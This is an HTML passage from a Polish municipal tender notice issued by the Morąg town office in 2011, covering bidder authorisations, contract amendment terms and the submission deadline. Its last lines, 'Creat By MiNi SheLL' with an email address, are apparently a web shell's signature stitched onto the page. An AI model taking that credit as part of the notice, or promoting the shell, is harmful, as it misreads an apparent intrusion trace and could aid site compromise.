5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. 
6) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty. 
7) Wypełnione i podpisane oświadczenie dotyczące realizacji przedmiotu zamówienia z udziałem podwykonawstwa - składają tylko wykonawcy zamierzający przedmiot zamówienia realizować przy udziale podwykonawstwa. (Załącznik nr 9)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1.Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron w formie pisemnego aneksu pod rygorem nieważności.
2.Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
a) Zmiany kwoty wynagrodzenia:
- w przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- w przypadku ustawowej zmiany stawki VAT strony zobowiązują się do zawarcia aneksu do umowy regulującego wysokość VAT z tym, że koszt wzrostu stawki VAT pokrywa Wykonawca,
-  w przypadku wystąpienia robót uzupełniających, dodatkowych lub zamiennych / koszty tych robót przyjmowane będą na podstawie kosztorysów sporządzonych wg ustalonych składników cenotwórczych zawartych w formularzu ofertowym Wykonawcy/,
- w przypadku wykonania mniejszego zakresu robót niż określony w dokumentacji technicznej proporcjonalnie do zakresu rzeczowego.
b) Zmiany terminu wykonania przedmiotu zamówienia:
- w przypadku zlecenia wykonania robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
- w przypadku wystąpienia anomalii pogodowych lub innych nieprzewidywalnych przyczyno charakterze obiektywnym, mających znaczny wpływ na termin wykonania,
- w związku ze stwierdzeniem braków lub błędów projektowych o czas niezbędny na poprawienie lub uzupełnienie projektu,
- w przypadku udzielenia zamówień uzupełniających przewidzianych w SIWZ pkt 4.1 jeżeli terminy ich zlecenia uniemożliwiają dotrzymanie pierwotnego terminu umownego,
Okres wydłużenia terminu zakończenia powinien odpowiadać okresom opóźnień wymienionych powyżej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.morag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu 
ul. 11 Listopada 9 
14-300 Morąg 
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 09:00, miejsce: Urząd Miejski w Morągu 
ul. 11 Listopada 9 
14-300 Morąg 
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com